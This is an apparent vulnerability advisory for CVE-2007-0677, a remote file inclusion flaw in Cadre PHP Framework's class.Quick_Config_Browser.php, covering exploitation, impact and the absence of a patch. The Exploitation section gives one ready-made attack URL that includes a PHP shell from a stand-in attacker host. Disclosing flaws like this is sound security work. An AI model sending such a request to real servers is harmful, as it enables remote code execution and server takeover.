CVE-2007-0677

Vulnerability

A PHP remote file inclusion vulnerability exists in fw/class.Quick_Config_Browser.php of Cadre PHP Framework version 20020724. The script unsafely uses include_once($GLOBALS[config][framework_path] . "class.Browser.php");, allowing an attacker to control the included file by supplying a URL via the GLOBALS[config][framework_path] parameter [1][2]. No authentication or special configuration is required to reach the vulnerable code path.

Exploitation

An attacker can exploit this by sending a crafted HTTP GET request to the vulnerable script. The parameter GLOBALS[config][framework_path] is set to a URL pointing to a malicious PHP script hosted on an attacker-controlled server. For example: http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php? [1][2]. The attacker does not need any prior access or authentication; the vulnerability is remotely exploitable over the network.

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the target server with the privileges of the web server process. This can lead to full compromise of the application and underlying system, including data theft, file manipulation, and further lateral movement [1][2].

Mitigation

No official patch or fixed version has been released for Cadre PHP Framework 20020724. The project appears to be unmaintained; users should consider migrating to an alternative framework or removing the vulnerable component entirely. No workaround is available that does not involve code modification [1][2].